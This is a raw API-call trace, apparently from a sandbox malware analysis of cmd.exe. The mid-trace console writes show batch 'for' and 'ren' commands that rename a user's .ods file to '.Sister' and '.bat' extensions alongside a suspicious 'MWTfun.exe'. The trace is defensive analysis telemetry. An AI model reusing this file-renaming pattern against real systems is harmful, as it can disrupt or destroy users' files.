(_Size=0xffce) returned 0x21ed8eb0900 [0114.415] ??_V@YAXPEAX@Z () returned 0x21ed8eb0900 [0114.415] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0114.415] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0114.415] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0114.415] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0114.415] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0114.415] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0114.415] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0114.415] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0114.415] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0114.415] ??_V@YAXPEAX@Z () returned 0x1 [0114.422] GetProcessHeap () returned 0x21ed8c70000 [0114.422] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8c78a80 [0114.422] GetProcessHeap () returned 0x21ed8c70000 [0114.422] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c78a80, Size=0x130) returned 0x21ed8c78a80 [0114.422] GetProcessHeap () returned 0x21ed8c70000 [0114.422] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c78a80) returned 0x130 [0114.422] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0114.423] malloc (_Size=0xffce) returned 0x21ed8eb0900 [0114.424] ??_V@YAXPEAX@Z () returned 0x21ed8eb0900 [0114.424] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0114.424] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed8eb0900, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0114.426] ??_V@YAXPEAX@Z () returned 0x1 [0114.426] GetProcessHeap () returned 0x21ed8c70000 [0114.426] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8c78bc0 [0114.426] GetProcessHeap () returned 0x21ed8c70000 [0114.426] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8c78d00 [0114.426] GetProcessHeap () returned 0x21ed8c70000 [0114.427] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c78d00, Size=0x130) returned 0x21ed8c78d00 [0114.427] GetProcessHeap () returned 0x21ed8c70000 [0114.427] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c78d00) returned 0x130 [0114.427] malloc (_Size=0xffce) returned 0x21ed8eb0900 [0114.427] ??_V@YAXPEAX@Z () returned 0x21ed8eb0900 [0114.427] GetProcessHeap () returned 0x21ed8c70000 [0114.427] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7d060 [0114.427] GetProcessHeap () returned 0x21ed8c70000 [0114.427] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8c78e40 [0114.427] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0114.427] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0114.427] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0114.427] GetLastError () returned 0x2 [0114.427] GetProcessHeap () returned 0x21ed8c70000 [0114.427] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8cb85d0 [0114.428] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8cb85e0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0114.428] SetErrorMode (uMode=0x0) returned 0x0 [0114.428] SetErrorMode (uMode=0x1) returned 0x0 [0114.428] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed8eb0900, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0114.428] SetErrorMode (uMode=0x0) returned 0x1 [0114.428] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0114.429] GetProcessHeap () returned 0x21ed8c70000 [0114.429] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8c790b0 [0114.429] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0114.429] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0114.429] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0114.429] GetLastError () returned 0x2 [0114.429] ??_V@YAXPEAX@Z () returned 0x1 [0114.429] malloc (_Size=0xffce) returned 0x21ed8eb0900 [0114.429] ??_V@YAXPEAX@Z () returned 0x21ed8eb0900 [0114.429] malloc (_Size=0xffce) returned 0x21ed8ec08e0 [0114.429] ??_V@YAXPEAX@Z () returned 0x21ed8ec08e0 [0114.430] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0114.430] GetLastError () returned 0x2 [0114.430] _get_osfhandle (_FileHandle=2) returned 0x54 [0114.430] GetFileType (hFile=0x54) returned 0x2 [0114.431] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0114.431] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0114.500] _get_osfhandle (_FileHandle=2) returned 0x54 [0114.500] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0114.572] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0118.358] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0118.358] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0118.949] longjmp () [0119.003] ??_V@YAXPEAX@Z () returned 0x1 [0119.005] FindNextFileW (in: hFindFile=0x21ed8c7cac0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46463cd0, ftCreationTime.dwHighDateTime=0x1d5ec98, ftLastAccessTime.dwLowDateTime=0xb6b41e00, ftLastAccessTime.dwHighDateTime=0x1d5eb31, ftLastWriteTime.dwLowDateTime=0xb6b41e00, ftLastWriteTime.dwHighDateTime=0x1d5eb31, nFileSizeHigh=0x0, nFileSizeLow=0x2385, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="1KOAcYCUfFYg9R3cp_.ods", cAlternateFileName="")) returned 1 [0119.005] GetProcessHeap () returned 0x21ed8c70000 [0119.005] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95eb0, Size=0x64) returned 0x21ed8c7c830 [0119.006] GetProcessHeap () returned 0x21ed8c70000 [0119.006] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7c830) returned 0x64 [0119.006] GetProcessHeap () returned 0x21ed8c70000 [0119.006] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8cc96e0 [0119.006] GetProcessHeap () returned 0x21ed8c70000 [0119.006] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cc96e0, Size=0x30) returned 0x21ed8cc96e0 [0119.006] GetProcessHeap () returned 0x21ed8c70000 [0119.007] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cc96e0) returned 0x30 [0119.007] GetProcessHeap () returned 0x21ed8c70000 [0119.007] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8cc9720 [0119.007] malloc (_Size=0x1ff9c) returned 0x21ed8ed08c0 [0119.009] GetProcessHeap () returned 0x21ed8c70000 [0119.009] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3e) returned 0x21ed8c7ba30 [0119.009] ??_V@YAXPEAX@Z () returned 0x1 [0119.010] GetProcessHeap () returned 0x21ed8c70000 [0119.010] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cc9720, Size=0x1e0) returned 0x21ed8cc9720 [0119.010] GetProcessHeap () returned 0x21ed8c70000 [0119.010] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cc9720) returned 0x1e0 [0119.010] GetProcessHeap () returned 0x21ed8c70000 [0119.010] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8cc9910 [0119.011] GetProcessHeap () returned 0x21ed8c70000 [0119.011] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cc9910, Size=0x290) returned 0x21ed8cc9910 [0119.011] GetProcessHeap () returned 0x21ed8c70000 [0119.011] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cc9910) returned 0x290 [0119.011] GetProcessHeap () returned 0x21ed8c70000 [0119.011] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8cc9bb0 [0119.011] GetProcessHeap () returned 0x21ed8c70000 [0119.011] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cc9bb0, Size=0x30) returned 0x21ed8cc9bb0 [0119.011] GetProcessHeap () returned 0x21ed8c70000 [0119.011] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cc9bb0) returned 0x30 [0119.011] GetProcessHeap () returned 0x21ed8c70000 [0119.011] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8cc9bf0 [0119.011] malloc (_Size=0x1ff9c) returned 0x21ed8ed08c0 [0119.013] GetProcessHeap () returned 0x21ed8c70000 [0119.013] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3e) returned 0x21ed8c7c110 [0119.013] ??_V@YAXPEAX@Z () returned 0x1 [0119.014] malloc (_Size=0x1ff9c) returned 0x21ed8ed08c0 [0119.016] GetFullPathNameW (in: lpFileName="1KOAcYCUfFYg9R3cp_.ods", nBufferLength=0xffce, lpBuffer=0x21ed8ed08c0, lpFilePart=0xa6cf4fe1c8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\1KOAcYCUfFYg9R3cp_.ods", lpFilePart=0xa6cf4fe1c8*="1KOAcYCUfFYg9R3cp_.ods") returned 0x2e [0119.016] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x4, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cc40 [0119.017] FindClose (in: hFindFile=0x21ed8c7cc40 | out: hFindFile=0x21ed8c7cc40) returned 1 [0119.017] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x4, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cbe0 [0119.017] FindClose (in: hFindFile=0x21ed8c7cbe0 | out: hFindFile=0x21ed8c7cbe0) returned 1 [0119.017] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x6df92a83, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x6df92a83, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x4, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7cee0 [0119.018] FindClose (in: hFindFile=0x21ed8c7cee0 | out: hFindFile=0x21ed8c7cee0) returned 1 [0119.018] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\1KOAcYCUfFYg9R3cp_.ods", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46463cd0, ftCreationTime.dwHighDateTime=0x1d5ec98, ftLastAccessTime.dwLowDateTime=0xb6b41e00, ftLastAccessTime.dwHighDateTime=0x1d5eb31, ftLastWriteTime.dwLowDateTime=0xb6b41e00, ftLastWriteTime.dwHighDateTime=0x1d5eb31, nFileSizeHigh=0x0, nFileSizeLow=0x2385, dwReserved0=0x4, dwReserved1=0x4, cFileName="1KOAcYCUfFYg9R3cp_.ods", cAlternateFileName="1KOACY~1.ODS")) returned 0x21ed8c7ca00 [0119.018] FindClose (in: hFindFile=0x21ed8c7ca00 | out: hFindFile=0x21ed8c7ca00) returned 1 [0119.018] _wcsnicmp (_String1="1KOACY~1.ODS", _String2="1KOAcYCUfFYg9R3cp_.ods", _MaxCount=0x16) returned 27 [0119.018] malloc (_Size=0x1ff9c) returned 0x21ed8ef0870 [0119.019] ??_V@YAXPEAX@Z () returned 0x21ed8ef0870 [0119.020] GetProcessHeap () returned 0x21ed8c70000 [0119.020] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36) returned 0x21ed8cc8a90 [0119.020] ??_V@YAXPEAX@Z () returned 0x1 [0119.020] ??_V@YAXPEAX@Z () returned 0x1 [0119.021] GetProcessHeap () returned 0x21ed8c70000 [0119.021] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cc9bf0, Size=0x1e0) returned 0x21ed8cc9bf0 [0119.021] GetProcessHeap () returned 0x21ed8c70000 [0119.021] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cc9bf0) returned 0x1e0 [0119.021] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0119.021] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.021] GetFileType (hFile=0x50) returned 0x2 [0119.021] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0119.021] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0119.210] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.210] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0119.212] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0119.212] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0119.212] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0119.212] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.212] GetFileType (hFile=0x50) returned 0x2 [0119.212] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0119.213] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0119.215] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.215] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0119.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.216] GetFileType (hFile=0x50) returned 0x2 [0119.216] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0119.216] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0119.216] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.216] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8cc96f0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8cc96f0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0119.217] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"1KOAcYCUfFYg9R3cp_.ods\" \"1KOAcYCUfFYg9R3cp_.ods.Sister\" ") returned 58 [0119.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.217] GetFileType (hFile=0x50) returned 0x2 [0119.217] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0119.217] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0119.217] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.217] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3a) returned 1 [0119.218] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0119.218] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.218] GetFileType (hFile=0x50) returned 0x2 [0119.218] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0119.218] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0119.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.219] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0119.219] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0119.219] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.219] GetFileType (hFile=0x50) returned 0x2 [0119.219] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0119.219] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0119.220] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.220] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0119.223] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0119.223] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.223] GetFileType (hFile=0x50) returned 0x2 [0119.223] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0119.223] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0119.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.224] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0119.224] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0119.224] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.224] GetFileType (hFile=0x50) returned 0x2 [0119.224] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0119.225] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0119.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.358] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0119.386] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.386] GetFileType (hFile=0x50) returned 0x2 [0119.387] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0119.387] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0119.466] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.466] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8cc9bc0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8cc9bc0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0119.486] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"1KOAcYCUfFYg9R3cp_.ods.Sister\" \"1KOAcYCUfFYg9R3cp_.bat\" ") returned 58 [0119.486] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.486] GetFileType (hFile=0x50) returned 0x2 [0119.486] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0119.486] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0119.507] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.507] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3a) returned 1 [0119.526] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0119.526] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.526] GetFileType (hFile=0x50) returned 0x2 [0119.526] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0119.526] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0120.099] _get_osfhandle (_FileHandle=1) returned 0x50 [0120.099] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0120.159] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0120.167] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0120.167] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0120.168] malloc (_Size=0xffce) returned 0x21ed8ed08c0 [0120.169] ??_V@YAXPEAX@Z () returned 0x21ed8ed08c0 [0120.170] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0120.170] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0120.170] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0120.170] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0120.170] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0120.170] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0120.170] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0120.170] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0120.170] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0120.170] ??_V@YAXPEAX@Z () returned 0x1 [0120.170] GetProcessHeap () returned 0x21ed8c70000 [0120.170] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xf8) returned 0x21ed8cc9de0 [0120.170] GetProcessHeap () returned 0x21ed8c70000 [0120.170] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cc9de0, Size=0x84) returned 0x21ed8cc9de0 [0120.170] GetProcessHeap () returned 0x21ed8c70000 [0120.170] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cc9de0) returned 0x84 [0120.171] GetProcessHeap () returned 0x21ed8c70000 [0120.171] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x8c) returned 0x21ed8c7c8a0 [0120.171] GetProcessHeap () returned 0x21ed8c70000 [0120.171] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xf8) returned 0x21ed8cc9e80 [0120.171] 